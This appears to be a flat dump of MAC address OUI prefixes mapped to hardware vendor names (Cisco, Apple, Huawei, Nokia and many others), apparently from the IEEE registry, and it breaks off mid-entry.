Cisco Systems, Inc E8FD90 Turbostor 2CAC44 CONEXTOP D013FD LG Electronics (Mobile Communications) BC644B ARRIS Group, Inc. 606405 Texas Instruments 1899F5 Sichuan Changhong Electric Ltd. 0025C3 21168 000F57 CABLELOGIC Co., Ltd. 000342 Nortel Networks A48269 Datrium, Inc. 10E68F KWANGSUNG ELECTRONICS KOREA CO.,LTD. 4CFACA Cambridge Industries(Group) Co.,Ltd. 18ABF5 Ultra Electronics Electrics B03EB0 MICRODIA Ltd. 001591 RLW Inc. 00182E XStreamHD 001283 Nortel Networks 0011F9 Nortel Networks 001158 Nortel Networks 000F6A Nortel Networks 000E62 Nortel Networks 000CF8 Nortel Networks 0026F1 ProCurve Networking by HP 380DD4 Primax Electronics Ltd. 98FDB4 Primax Electronics Ltd. D8C46A Murata Manufacturing Co., Ltd. D8FB68 Cloud Corner Ltd. 685388 P&S Technology 982F3C Sichuan Changhong Electric Ltd. 14C1FF ShenZhen QianHai Comlan communication Co.,LTD 000417 ELAU AG ECFAAA The IMS Company F00786 Shandong Bittel Electronics Co., Ltd 00D0F6 Nokia 54A619 Alcatel-Lucent Shanghai Bell Co., Ltd 000997 Nortel Networks 001CEB Nortel Networks 001C17 Nortel Networks 001A8F Nortel Networks 0017D1 Nortel Networks 888322 Samsung Electronics Co.,Ltd E89309 Samsung Electronics Co.,Ltd 0014C7 Nortel Networks 001DAF Nortel Networks 88A6C6 Sagemcom Broadband SAS 94D469 Cisco Systems, Inc 882BD7 ADDÉNERGIETECHNOLOGIES 0090CC PLANEX COMMUNICATIONS INC. 2057AF Shenzhen FH-NET OPTOELECTRONICS CO.,LTD 54DC1D Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd ACA213 Shenzhen Bilian electronic CO.,LTD 3C3300 Shenzhen Bilian electronic CO.,LTD 6CD032 LG Electronics 3CBDD8 LG ELECTRONICS INC 344DF7 LG Electronics (Mobile Communications) 583F54 LG Electronics (Mobile Communications) 0022CF PLANEX COMMUNICATIONS INC. E417D8 8BITDO TECHNOLOGY HK LIMITED 9CD332 PLC Technology Ltd 38F8CA OWIN Inc. 44334C Shenzhen Bilian electronic CO.,LTD 64899A LG Electronics (Mobile Communications) 002105 Alcatel-Lucent IPD 001BC5 IEEE Registration Authority 48DF37 Hewlett Packard Enterprise C0E42D TP-LINK TECHNOLOGIES CO.,LTD. 8CA6DF TP-LINK TECHNOLOGIES CO.,LTD. 8416F9 TP-LINK TECHNOLOGIES CO.,LTD. 18D6C7 TP-LINK TECHNOLOGIES CO.,LTD. 78C3E9 Samsung Electronics Co.,Ltd 8C1ABF Samsung Electronics Co.,Ltd 30CBF8 Samsung Electronics Co.,Ltd A0CBFD Samsung Electronics Co.,Ltd E45D75 Samsung Electronics Co.,Ltd 00E04D INTERNET INITIATIVE JAPAN, INC F8A9D0 LG Electronics (Mobile Communications) CCFA00 LG Electronics (Mobile Communications) 74A722 LG Electronics (Mobile Communications) F01C13 LG Electronics (Mobile Communications) 58FCDB IEEE Registration Authority B0C5CA IEEE Registration Authority 7419F8 IEEE Registration Authority A816B2 LG Electronics (Mobile Communications) 64BC0C LG Electronics (Mobile Communications) 90C682 IEEE Registration Authority C01ADA Apple, Inc. 000031 QPSX COMMUNICATIONS, LTD. 000E1E QLogic Corporation 0014D1 TRENDnet, Inc. CC52AF Universal Global Scientific Industrial Co., Ltd. 001C14 VMware, Inc. 005056 VMware, Inc. 00121C PARROT SA 9003B7 PARROT SA 208756 SIEMENS AG 74B472 CIESSE FCF152 Sony Corporation 483C0C HUAWEI TECHNOLOGIES CO.,LTD 309BAD BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 001BB1 Wistron Neweb Corporation 0080F7 Zenith Electronics Corporation BC307D Wistron Neweb Corporation 48A9D2 Wistron Neweb Corporation 80EA23 Wistron Neweb Corporation 002713 Universal Global Scientific Industrial Co., Ltd. BC307E Wistron Neweb Corporation 08952A Technicolor CH USA Inc. 4432C8 Technicolor CH USA Inc. 38A28C SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. B4A5EF Sercomm Corporation. 849D64 SMC Corporation 0010C1 OI ELECTRIC CO.,LTD 28BE9B Technicolor CH USA Inc. FC528D Technicolor CH USA Inc. 506583 Texas Instruments B09122 Texas Instruments FC51A4 ARRIS Group, Inc. 9857D3 HON HAI-CCPBGPRECISION IND.CO.,LTD. FCF528 Zyxel Communications Corporation 00A0C5 Zyxel Communications Corporation A09E1A Polar Electro Oy 1CD6BD LEEDARSON LIGHTING CO., LTD. D0D94F IEEE Registration Authority 001E04 Hanson Research Corporation 60C0BF ON Semiconductor AC0481 Jiangsu Huaxing Electronics Co., Ltd. 68B35E Shenzhen Neostra Technology Co.Ltd 408805 Motorola Mobility LLC, a Lenovo Company 24E271 Qingdao Hisense Communications Co.,Ltd. BC6010 Qingdao Hisense Communications Co.,Ltd. D0FCCC Samsung Electronics Co.,Ltd 98398E Samsung Electronics Co.,Ltd 44D1FA Shenzhen Yunlink Technology Co., Ltd F0F644 Whitesky Science & Technology Co.,Ltd. 20F17C HUAWEI TECHNOLOGIES CO.,LTD 346AC2 HUAWEI TECHNOLOGIES CO.,LTD C41CFF Vizio, Inc C09727 SAMSUNG ELECTRO-MECHANICS(THAILAND) DC293A Shenzhen Nuoshi Technology Co., LTD. 7C6AF3 Integrated Device Technology (Malaysia) Sdn. Bhd. E46251 HAO CHENG GROUP LIMITED 40562D Smartron India Pvt ltd 3876D1 Euronda SpA C4693E Turbulence Design Inc. 009569 LSD Science and Technology Co.,Ltd. B0CF4D MI-Zone Technology Ireland 289AFA TCT mobile ltd 001A34 Konka Group Co., Ltd. 0011FC HARTING Electronics GmbH 002389 Hangzhou H3C Technologies Co., Limited 3CE5A6 Hangzhou H3C Technologies Co., Limited 5CDD70 Hangzhou H3C Technologies Co., Limited 3C8C40 Hangzhou H3C Technologies Co., Limited A067BE Sicon srl D8209F Cubro Acronet GesmbH 8C7716 LONGCHEER TELECOMMUNICATION LIMITED 68FB7E Apple, Inc. 84A134 Apple, Inc. A0D385 AUMA Riester GmbH & Co. KG 1414E6 Ningbo Sanhe Digital Co.,Ltd 002582 Maksat Technologies (P) Ltd 0C5101 Apple, Inc. 2CF0A2 Apple, Inc. 48C049 Broad Telecom SA AC6FBB TATUNG Technology Inc. 001C41 scemtec Transponder Technology GmbH 146308 JABIL CIRCUIT (SHANGHAI) LTD. 001E25 INTEK DIGITAL 00E0CF INTEGRATED DEVICE 904D4A Sagemcom Broadband SAS 044E5A ARRIS Group, Inc. 0060B1 Input/Output, Inc. 547F54 INGENICO 6C2483 Microsoft Mobile Oy 6891D0 IEEE Registration Authority E04F43 Universal Global Scientific Industrial Co., Ltd. 38700C ARRIS Group, Inc. 000E2E Edimax Technology Co. Ltd. 00065F ECI Telecom Ltd. 00208F ECI Telecom Ltd. 844076 Drivenets 001CD7 Harman/Becker Automotive Systems GmbH 003A7D Cisco Systems, Inc 90C7D8 zte corporation 00185C EDSLAB Technologies 001A45 GN Netcom A/S 002088 GLOBAL VILLAGE COMMUNICATION 541379 Hon Hai Precision Ind. Co.,Ltd. 001921 Elitegroup Computer Systems Co.,Ltd. 0016EC Elitegroup Computer Systems Co.,Ltd. 000795 Elitegroup Computer Systems Co.,Ltd. FC0F4B Texas Instruments D4883F HDPRO CO., LTD. 1088CE Fiberhome Telecommunication Technologies Co.,LTD 60B617 Fiberhome Telecommunication Technologies Co.,LTD DC9C9F Shenzhen YOUHUA Technology Co., Ltd 74DFBF Liteon Technology Corporation F03E90 Ruckus Wireless D8D723 IDS, Inc 84AD58 HUAWEI TECHNOLOGIES CO.,LTD 58605F HUAWEI TECHNOLOGIES CO.,LTD 00A0F4 GE AC0D1B LG Electronics (Mobile Communications) F0D1B8 LEDVANCE 986D35 IEEE Registration Authority 88795B Konka Group Co., Ltd. 081F71 TP-LINK TECHNOLOGIES CO.,LTD. 5CCA1A Microsoft Mobile Oy FC2FAA Nokia B07E70 Zadara Storage Ltd. 0080B1 SOFTCOM A/S 202DF8 Digital Media Cartridge Ltd. 10D0AB zte corporation 0004C6 YAMAHA MOTOR CO.,LTD 18A3E8 Fiberhome Telecommunication Technologies Co.,LTD 741E93 Fiberhome Telecommunication Technologies Co.,LTD 202D07 Samsung Electronics Co.,Ltd D8803C Anhui Huami Information Technology Company Limited 0034DA LG Electronics (Mobile Communications) 3810D5 AVM Audiovisuelles Marketing und Computersysteme GmbH 18C501 SHENZHEN GONGJIN ELECTRONICS CO.,LT 00A0B8 NetApp 00C88B Cisco Systems, Inc 24C3F9 Securitas Direct AB 2C21D7 IMAX Corporation 0009D2 Mai Logic Inc. 006016 CLARIION 981FB1 Shenzhen Lemon Network Technology Co.,Ltd 0C5A9E Wi-SUN Alliance B44BD2 Apple, Inc. DC415F Apple, Inc. 641225 Cisco Systems, Inc 7864E6 Green Motive Technology Limited 3CBEE1 NIKON CORPORATION 102AB3 Xiaomi Communications Co Ltd 40D357 Ison Technology Co., Ltd. A41588 ARRIS Group, Inc. F45C89 Apple, Inc. 20768F Apple, Inc. 9C5CF9 Sony Mobile Communications Inc 0011D1 Soft Imaging System GmbH 98D686 Chyi Lee industry Co., ltd. 8CC661 Current, powered by GE 88A084 Formation Data Systems E8B2AC Apple, Inc. E49A79 Apple, Inc. 30A9DE LG Innotek F01B6C vivo Mobile Communication Co., Ltd. A0B9ED Skytap 94C960 Zhongshan B&T technology.co.,ltd 74C330 SHENZHEN FAST TECHNOLOGIES CO.,LTD 403F8C TP-LINK TECHNOLOGIES CO.,LTD. DCB3B4 Honeywell Environmental & Combustion Controls (Tianjin) Co., Ltd. 001D3B Nokia Danmark A/S 001DFD Nokia Danmark A/S 001E3B Nokia Danmark A/S 001EA4 Nokia Danmark A/S 0026CC Nokia Danmark A/S 000EED Nokia Danmark A/S 4C2578 Nokia Corporation BCC6DB Nokia Corporation 60A8FE Nokia 00119F Nokia Danmark A/S 001A16 Nokia Danmark A/S 001A89 Nokia Danmark A/S 001ADC Nokia Danmark A/S 0025CF Nokia Danmark A/S 0021AB Nokia Danmark A/S 001FDE Nokia Danmark A/S 001FDF Nokia Danmark A/S 547975 Nokia Corporation A87B39 Nokia Corporation 00247C Nokia Danmark A/S 002266 Nokia Danmark A/S 0021FE Nokia Danmark A/S C477AB Beijing ASU Tech Co.,Ltd 000BCA DATAVAN TC 702559 CyberTAN Technology Inc. 607EDD Microsoft Mobile Oy A8A089 Tactical Communications 48365F Wintecronics Ltd. 001D20 Comtrend Corporation 08373D Samsung Electronics Co.,Ltd 0C75BD Cisco Systems, Inc 300D43 Microsoft Mobile Oy 00000E FUJITSU LIMITED 000B5D FUJITSU LIMITED C488E5 Samsung Electronics Co.,Ltd 080581 Roku, Inc. 000DF3 Asmax Solutions 80ACAC Juniper Networks 000DB6 Broadcom 000AF7 Broadcom D40129 Broadcom 001D00 Brivo Systems, LLC 0020D6 Breezecom, Ltd. 00E063 Cabletron Systems, Inc. FCC734 Samsung Electronics Co.,Ltd 8425DB Samsung Electronics Co.,Ltd B0EC71 Samsung Electronics Co.,Ltd E458B8 Samsung Electronics Co.,Ltd 088C2C Samsung Electronics Co.,Ltd 64B853 Samsung Electronics Co.,Ltd 389496 Samsung Electronics Co.,Ltd 5056BF Samsung Electronics Co.,Ltd 90F1AA Samsung Electronics Co.,Ltd 1077B1 Samsung Electronics Co.,Ltd 001FC7 Casio Hitachi Mobile Communications Co., Ltd. A49A58 Samsung Electronics Co.,Ltd 08EE8B Samsung Electronics Co.,Ltd 0CA42A OB Telecom Electronic Technology Co., Ltd 74458A Samsung Electronics Co.,Ltd 5CDC96 Arcadyan Technology Corporation 743170 Arcadyan Technology Corporation 001A2A Arcadyan Technology Corporation 88252C Arcadyan Technology Corporation 40BA61 ARIMA Communications Corp. 0011F5 ASKEY COMPUTER CORP 0016E3 ASKEY COMPUTER CORP E839DF ASKEY COMPUTER CORP 1CC63C Arcadyan Technology Corporation 1883BF Arcadyan Technology Corporation 68ED43 BlackBerry RTS 70AAB2 BlackBerry RTS 00146C NETGEAR 001E2A NETGEAR 00184D NETGEAR 00040E AVM GmbH 9CC7A6 AVM GmbH A06391 NETGEAR 20E52A NETGEAR 4494FC NETGEAR 200CC8 NETGEAR C4473F HUAWEI TECHNOLOGIES CO.,LTD 744401 NETGEAR E091F5 NETGEAR 000F86 BlackBerry RTS 0024D2 ASKEY COMPUTER CORP B4EEB4 ASKEY COMPUTER CORP E46449 ARRIS Group, Inc. 40FC89 ARRIS Group, Inc. 2C9E5F ARRIS Group, Inc. 002636 ARRIS Group, Inc. 001CC1 ARRIS Group, Inc. 001E5A ARRIS Group, Inc. 001371 ARRIS Group, Inc. 0023EE ARRIS Group, Inc. 001ADE ARRIS Group, Inc. 745612 ARRIS Group, Inc. 0050E3 ARRIS Group, Inc. 002136 ARRIS Group, Inc. 001626 ARRIS Group, Inc. 0019A6 ARRIS Group, Inc. E8C74F Liteon Technology Corporation D05349 Liteon Technology Corporation E8F724 Hewlett Packard Enterprise 5CB524 Sony Mobile Communications Inc 90C115 Sony Mobile Communications Inc D05162 Sony Mobile Communications Inc 18002D Sony Mobile Communications Inc 280DFC Sony Interactive Entertainment Inc. 001311 ARRIS Group, Inc. D0DF9A Liteon Technology Corporation 1C659D Liteon Technology Corporation 3010B3 Liteon Technology Corporation 701A04 Liteon Technology Corporation 48D224 Liteon Technology Corporation 20689D Liteon Technology Corporation 0024EF Sony Mobile Communications Inc 0025E7 Sony Mobile Communications Inc 58170C Sony Mobile Communications Inc 0016B8 Sony Mobile Communications Inc 7CBFB1 ARRIS Group, Inc. 080046 Sony Corporation ECF00E AboCom 00E098 AboCom 74DAEA Texas Instruments 948815 Infinique Worldwide Inc D0E44A Murata Manufacturing Co., Ltd. 384FF0 AzureWave Technology Inc. E874E6 ADB Broadband Italia 0020E0 Actiontec Electronics, Inc 002662 Actiontec Electronics, Inc 002553 ADB Broadband Italia 00193E ADB Broadband Italia 000827 ADB Broadband Italia 742F68 AzureWave Technology Inc. 4C14A3 TCL Technoly Electronics (Huizhou) Co., Ltd. 4CB0E8 Beijing RongZhi xinghua technology co., LTD D887D5 Leadcore Technology CO.,LTD 00F28B Cisco Systems, Inc 34E6AD Intel Corporate 081196 Intel Corporate 183DA2 Intel Corporate 809B20 Intel Corporate 002314 Intel Corporate 340286 Intel Corporate 001CBF Intel Corporate B4B676 Intel Corporate 3CA9F4 Intel Corporate B88A60 Intel Corporate 78FF57 Intel Corporate 9C4E36 Intel Corporate 3413E8 Intel Corporate 002710 Intel Corporate A48E0A DeLaval International AB AC2B6E Intel Corporate 9C3583 Nipro Diagnostics, Inc C06118 TP-LINK TECHNOLOGIES CO.,LTD. B82A72 Dell Inc. F8E079 Motorola Mobility LLC, a Lenovo Company CCC3EA Motorola Mobility LLC, a Lenovo Company 40786A Motorola Mobility LLC, a Lenovo Company 0019D1 Intel Corporate 0019D2 Intel Corporate 001B21 Intel Corporate 18FF0F Intel Corporate 34DE1A Intel Corporate E8B1FC Intel Corporate CC3D82 Intel Corporate 001F3C Intel Corporate 002315 Intel Corporate 00166F Intel Corporate 000A8A Cisco Systems, Inc 001D09 Dell Inc. 0023AE Dell Inc. BC305B Dell Inc. 388602 Flexoptix GmbH 4065A3 Sagemcom Broadband SAS D02212 IEEE Registration Authority 100723 IEEE Registration Authority A44F29 IEEE Registration Authority 74F8DB IEEE Registration Authority A43BFA IEEE Registration Authority B8CA3A Dell Inc. ECF4BB Dell Inc. D4BED9 Dell Inc. 00194B Sagemcom Broadband SAS 001E74 Sagemcom Broadband SAS 383BC8 2Wire Inc 60FE20 2Wire Inc 002456 2Wire Inc C0830A 2Wire Inc 00183F 2Wire Inc 000D56 Dell Inc. 181E78 Sagemcom Broadband SAS 0037B7 Sagemcom Broadband SAS 0054BD Swelaser AB 001E4C Hon Hai Precision Ind. Co.,Ltd. 20BB76 COL GIOVANNI PAOLO SpA 3CDD89 SOMO HOLDINGS & TECH. CO.,LTD. 1801E3 Bittium Wireless Ltd 149182 Belkin International Inc. 18622C Sagemcom Broadband SAS 3C81D8 Sagemcom Broadband SAS 40F201 Sagemcom Broadband SAS D084B0 Sagemcom Broadband SAS D8543A Texas Instruments 649C8E Texas Instruments 102EAF Texas Instruments 7C8EE4 Texas Instruments B4EED4 Texas Instruments D03761 Texas Instruments C83E99 Texas Instruments 40984E Texas Instruments 0017EB Texas Instruments 0017E6 Texas Instruments C4EDBA Texas Instruments 001832 Texas Instruments 3C2DB7 Texas Instruments 5464D9 Sagemcom Broadband SAS 00195B D-Link Corporation 000F3D D-Link Corporation 24DA11 NO NDA Inc EC2280 D-Link International 9C8E99 Hewlett Packard 9059AF Texas Instruments BC6A29 Texas Instruments 847E40 Texas Instruments 001735 Intel Wireless Network Group 74AC5F Qiku Internet Network Scientific (Shenzhen) Co., Ltd. 38CADA Apple, Inc. D0B33F Shenzhen TINNO Mobile Technology Corp. BCD1D3 Shenzhen TINNO Mobile Technology Corp. D83C69 Shenzhen TINNO Mobile Technology Corp. F4F5D8 Google, Inc. 8C579B Wistron Neweb Corporation 0059AC KPN. B.V. 40D855 IEEE Registration Authority 34AB37 Apple, Inc. 2400BA HUAWEI TECHNOLOGIES CO.,LTD 24DF6A HUAWEI TECHNOLOGIES CO.,LTD 788B77 Standar Telecom B0C090 Chicony Electronics Co., Ltd. 907F61 Chicony Electronics Co., Ltd. 0C0535 Juniper Systems BC83A7 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD BCEC23 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 18AF61 Apple, Inc. 5CF938 Apple, Inc. 009069 Juniper Networks 64649B Juniper Networks F01C2D Juniper Networks 307C5E Juniper Networks AC06C7 ServerNet S.r.l. E83EFC ARRIS Group, Inc. 900DCB ARRIS Group, Inc. 001DCD ARRIS Group, Inc. 001DD2 ARRIS Group, Inc. 8C09F4 ARRIS Group, Inc. 8857EE BUFFALO.INC 101F74 Hewlett Packard 009C02 Hewlett Packard F4CE46 Hewlett Packard DCFB02 BUFFALO.INC 001635 Hewlett Packard 0008C7 Hewlett Packard 0010E3 Hewlett Packard 000883 Hewlett Packard A02BB8 Hewlett Packard 0019BB Hewlett Packard 001F29 Hewlett Packard 00215A Hewlett Packard 00237D Hewlett Packard E8ED05 ARRIS Group, Inc. 789684 ARRIS Group, Inc. CC65AD ARRIS Group, Inc. 002655 Hewlett Packard 000D9D Hewlett Packard 001560 Hewlett Packard 00207B Intel Corporation 001175 Intel Corporation 780CB8 Intel Corporate 185E0F Intel Corporate 2C8158 Hon Hai Precision Ind. Co.,Ltd. 8002DF ORA Inc. 00306E Hewlett Packard 3C4A92 Hewlett Packard 7C7D3D HUAWEI TECHNOLOGIES CO.,LTD 4482E5 HUAWEI TECHNOLOGIES CO.,LTD 00234E Hon Hai Precision Ind. Co.,Ltd. 2C233A Hewlett Packard 000A57 Hewlett Packard 0001E7 Hewlett Packard 0001E6 Hewlett Packard 002376 HTC Corporation 38E7D8 HTC Corporation 188796 HTC Corporation B4CEF6 HTC Corporation 8CDCD4 Hewlett Packard D4C9EF Hewlett Packard FC15B4 Hewlett Packard 3CA82A Hewlett Packard EC5F23 Qinghai Kimascend Electronics Technology Co. Ltd. 047D50 Shenzhen Kang Ying Technology Co.Ltd. 54EFFE Fullpower Technologies, Inc. 940937 HUMAX Co., Ltd. E84DD0 HUAWEI TECHNOLOGIES CO.,LTD 0C45BA HUAWEI TECHNOLOGIES CO.,LTD 20906F Shenzhen Tencent Computer System Co., Ltd. 6CE3B6 Nera Telecommunications Ltd. DCD321 HUMAX Co., Ltd. 6C72E7 Apple, Inc. 741BB2 Apple, Inc. 6CE873 TP-LINK TECHNOLOGIES CO.,LTD. C46E1F TP-LINK TECHNOLOGIES CO.,LTD. 50FA84 TP-LINK TECHNOLOGIES CO.,LTD. 44B32D TP-LINK TECHNOLOGIES CO.,LTD. CC4463 Apple, Inc. 882593 TP-LINK TECHNOLOGIES CO.,LTD. 001FE1 Hon Hai Precision Ind. Co.,Ltd. D85D4C TP-LINK TECHNOLOGIES CO.,LTD. A0F3C1 TP-LINK TECHNOLOGIES CO.,LTD. 001D0F TP-LINK TECHNOLOGIES CO.,LTD. 0023CD TP-LINK TECHNOLOGIES CO.,LTD. 90489A Hon Hai Precision Ind. Co.,Ltd. 0071CC Hon Hai Precision Ind. Co.,Ltd. B05B67 HUAWEI TECHNOLOGIES CO.,LTD CCA223 HUAWEI TECHNOLOGIES CO.,LTD 786A89 HUAWEI TECHNOLOGIES CO.,LTD 384608 zte corporation 4CAC0A zte corporation B4B362 zte corporation B075D5 zte corporation D0154A zte corporation 0026ED zte corporation 006057 Murata Manufacturing Co., Ltd. 783E53 BSkyB Ltd 0019FB BSkyB Ltd 14B968 HUAWEI TECHNOLOGIES CO.,LTD 5CF96A HUAWEI TECHNOLOGIES CO.,LTD 083E8E Hon Hai Precision Ind. Co.,Ltd. 002293 zte corporation 10A5D0 Murata Manufacturing Co., Ltd. 50A72B HUAWEI TECHNOLOGIES CO.,LTD 0CD6BD HUAWEI TECHNOLOGIES CO.,LTD 00F81C HUAWEI TECHNOLOGIES CO.,LTD 087A4C HUAWEI TECHNOLOGIES CO.,LTD ACE215 HUAWEI TECHNOLOGIES CO.,LTD 346BD3 HUAWEI TECHNOLOGIES CO.,LTD 70723C HUAWEI TECHNOLOGIES CO.,LTD ACE87B HUAWEI TECHNOLOGIES CO.,LTD F83DFF HUAWEI TECHNOLOGIES CO.,LTD 285FDB HUAWEI TECHNOLOGIES CO.,LTD 404D8E HUAWEI TECHNOLOGIES CO.,LTD 4C5499 HUAWEI TECHNOLOGIES CO.,LTD F49FF3 HUAWEI TECHNOLOGIES CO.,LTD 240995 HUAWEI TECHNOLOGIES CO.,LTD 84DBAC HUAWEI TECHNOLOGIES CO.,LTD 94772B HUAWEI TECHNOLOGIES CO.,LTD D440F0 HUAWEI TECHNOLOGIES CO.,LTD 04021F HUAWEI TECHNOLOGIES CO.,LTD 10CDAE Avaya Inc 048A15 Avaya Inc B4B017 Avaya Inc 90FB5B Avaya Inc C8F406 Avaya Inc 7052C5 Avaya Inc F81547 Avaya Inc 506184 Avaya Inc 185936 Xiaomi Communications Co Ltd 20A783 miControl GmbH 200BC7 HUAWEI TECHNOLOGIES CO.,LTD F84ABF HUAWEI TECHNOLOGIES CO.,LTD 78D752 HUAWEI TECHNOLOGIES CO.,LTD 104780 HUAWEI TECHNOLOGIES CO.,LTD 548998 HUAWEI TECHNOLOGIES CO.,LTD 00040D Avaya Inc 70A8E3 HUAWEI TECHNOLOGIES CO.,LTD F8E811 HUAWEI TECHNOLOGIES CO.,LTD F8A45F Xiaomi Communications Co Ltd 640980 Xiaomi Communications Co Ltd 94049C HUAWEI TECHNOLOGIES CO.,LTD 688F84 HUAWEI TECHNOLOGIES CO.,LTD 30D17E HUAWEI TECHNOLOGIES CO.,LTD 0050BD Cisco Systems, Inc 00906F Cisco Systems, Inc 74D6EA Texas Instruments 209148 Texas Instruments 544A16 Texas Instruments E02F6D Cisco Systems, Inc 58971E Cisco Systems, Inc B4E9B0 Cisco Systems, Inc 000832 Cisco Systems, Inc 189C5D Cisco Systems, Inc 5CA48A Cisco Systems, Inc 1C1D86 Cisco Systems, Inc 60735C Cisco Systems, Inc 34A84E Cisco Systems, Inc 54781A Cisco Systems, Inc 00605C Cisco Systems, Inc 0006C1 Cisco Systems, Inc 00E014 Cisco Systems, Inc DCA5F4 Cisco Systems, Inc 5017FF Cisco Systems, Inc 70105C Cisco Systems, Inc 10F311 Cisco Systems, Inc 0050F0 Cisco Systems, Inc 005014 Cisco Systems, Inc 0090F2 Cisco Systems, Inc 0CE0E4 PLANTRONICS, INC. 74A2E6 Cisco Systems, Inc BCF1F2 Cisco Systems, Inc C80084 Cisco Systems, Inc 40A6E8 Cisco Systems, Inc 3085A9 ASUSTek COMPUTER INC. B83861 Cisco Systems, Inc 580A20 Cisco Systems, Inc 2C3ECF Cisco Systems, Inc B05947 Shenzhen Qihu Intelligent Technology Company Limited 346288 Cisco Systems, Inc CCD8C1 Cisco Systems, Inc 7C0ECE Cisco Systems, Inc A0ECF9 Cisco Systems, Inc 508789 Cisco Systems, Inc 381C1A Cisco Systems, Inc BC671C Cisco Systems, Inc 001947 Cisco SPVTG 001839 Cisco-Linksys, LLC 002215 ASUSTek COMPUTER INC. E0CB4E ASUSTek COMPUTER INC. 547C69 Cisco Systems, Inc 001731 ASUSTek COMPUTER INC. DCCEC1 Cisco Systems, Inc 9C57AD Cisco Systems, Inc 60FEC5 Apple, Inc. E425E7 Apple, Inc. BC926B Apple, Inc. 101C0C Apple, Inc. 080007 Apple, Inc. 004096 Cisco Systems, Inc 30F70D Cisco Systems, Inc E86549 Cisco Systems, Inc B07D47 Cisco Systems, Inc 38ED18 Cisco Systems, Inc 382056 Cisco Systems, Inc 40D32D Apple, Inc. C42C03 Apple, Inc. 9027E4 Apple, Inc. 109ADD Apple, Inc. 581FAA Apple, Inc. 88C663 Apple, Inc. 001F5B Apple, Inc. 002436 Apple, Inc. 00254B Apple, Inc. 0016CB Apple, Inc. 0017F2 Apple, Inc. 7C6D62 Apple, Inc. 20C9D0 Apple, Inc. 68967B Apple, Inc. 84FCFE Apple, Inc. E48B7F Apple, Inc. 008865 Apple, Inc. BC3BAF Apple, Inc. 3CE072 Apple, Inc. 38484C Apple, Inc. A46706 Apple, Inc. 8C5877 Apple, Inc. 7CF05F Apple, Inc. 804971 Apple, Inc. 6C3E6D Apple, Inc. BC6778 Apple, Inc. D8D1CB Apple, Inc. A8FAD8 Apple, Inc. B817C2 Apple, Inc. 7C11BE Apple, Inc. 283737 Apple, Inc. 50EAD6 Apple, Inc. 98D6BB Apple, Inc. 189EFC Apple, Inc. ACCF5C Apple, Inc. 80006E Apple, Inc. 848E0C Apple, Inc. 3C15C2 Apple, Inc. 6C709F Apple, Inc. C0F2FB Apple, Inc. 24E314 Apple, Inc. 80E650 Apple, Inc. 90FD61 Apple, Inc. 087045 Apple, Inc. A88808 Apple, Inc. A4C361 Apple, Inc. 2CF0EE Apple, Inc. 5C97F3 Apple, Inc. D4F46F Apple, Inc. 6476BA Apple, Inc. 34E2FD Apple, Inc. 04489A Apple, Inc. F0F61C Apple, Inc. 8C2937 Apple, Inc. B09FBA Apple, Inc. 0C4DE9 Apple, Inc. E0F5C6 Apple, Inc. A0EDCD Apple, Inc. F0F249 Hitron Technologies. Inc 2857BE Hangzhou Hikvision Digital Technology Co.,Ltd. 5CF5DA Apple, Inc. 18EE69 Apple, Inc. 649ABE Apple, Inc. F099BF Apple, Inc. 94E96A Apple, Inc. AC293A Apple, Inc. 9CFC01 Apple, Inc. 9C35EB Apple, Inc. 48437C Apple, Inc. 34A395 Apple, Inc. 787E61 Apple, Inc. 60F81D Apple, Inc. 38C986 Apple, Inc. D03311 Apple, Inc. 507A55 Apple, Inc. C8C2C6 Shanghai Airm2m Communication Technology Co., Ltd 789C85 August Home, Inc. 74D7CA Panasonic Corporation Automotive 5882A8 Microsoft 58685D Tempo Australia Pty Ltd 544B8C Juniper Networks DCFE07 PEGATRON CORPORATION 707938 Wuxi Zhanrui Electronic Technology Co.,LTD 243184 SHARP Corporation 582BDB Pax AB E03676 HUAWEI TECHNOLOGIES CO.,LTD EC388F HUAWEI TECHNOLOGIES CO.,LTD D03E5C HUAWEI TECHNOLOGIES CO.,LTD C49E41 G24 Power Limited B813E9 Trace Live Network 80B709 Viptela, Inc F00D5C JinQianMaoTechnology Co.,Ltd. 54BE53 zte corporation 280E8B Beijing Spirit Technology Development Co., Ltd. F44D30 Elitegroup Computer Systems Co.,Ltd. 0C8610 Juniper Networks 38D40B Samsung Electronics Co.,Ltd E83A12 Samsung Electronics Co.,Ltd 24DA9B Motorola Mobility LLC, a Lenovo Company 30E090 Linctronix Ltd, A4DCBE HUAWEI TECHNOLOGIES CO.,LTD ECB870 Beijing Heweinet Technology Co.,Ltd. 94BBAE Husqvarna AB D40AA9 ARRIS Group, Inc. 203D66 ARRIS Group, Inc. D494E8 HUAWEI TECHNOLOGIES CO.,LTD B078F0 Beijing HuaqinWorld Technology Co.,Ltd. 209BCD Apple, Inc. 3095E3 SHANGHAI SIMCOM LIMITED 80656D Samsung Electronics Co.,Ltd FCF136 Samsung Electronics Co.,Ltd B88687 Liteon Technology Corporation 18895B Samsung Electronics Co.,Ltd 584925 E3 Enterprise 94F278 Elma Electronic 283713 Shenzhen 3Nod Digital Technology Co., Ltd. 0894EF Wistron Infocomm (Zhongshan) Corporation E0319E Valve Corporation 3C5CC3 Shenzhen First Blue Chip Technology Ltd C49FF3 Mciao Technologies, Inc. 788E33 Jiangsu SEUIC Technology Co.,Ltd ECEED8 ZTLX Network Technology Co.,Ltd 80EB77 Wistron Corporation 483974 Proware Technologies Co., Ltd. 30FFF6 HangZhou KuoHeng Technology Co.,ltd D8EFCD Nokia 4CC681 Shenzhen Aisat Electronic Co., Ltd. 48E244 Hon Hai Precision Ind. Co.,Ltd. 7CAB25 MESMO TECHNOLOGY INC. B0411D ITTIM Technologies F8BF09 HUAWEI TECHNOLOGIES CO.,LTD 7CB25C Acacia Communications DCDB70 Tonfunk Systementwicklung und Service GmbH 800B51 Chengdu XGimi Technology Co.,Ltd F80D60 CANON INC. F0182B LG Chem 3481F4 SST Taiwan Ltd. 7CA237 King Slide Technology CO., LTD. D404CD ARRIS Group, Inc. 584822 Sony Mobile Communications Inc 747336 MICRODIGTAL Inc 382B78 ECO PLUGS ENTERPRISE CO., LTD A47B2C Nokia 24E5AA Philips Oral Healthcare, Inc. 78BDBC Samsung Electronics Co.,Ltd 349B5B Maquet GmbH 884157 Shenzhen Atsmart Technology Co.,Ltd. D89A34 Beijing 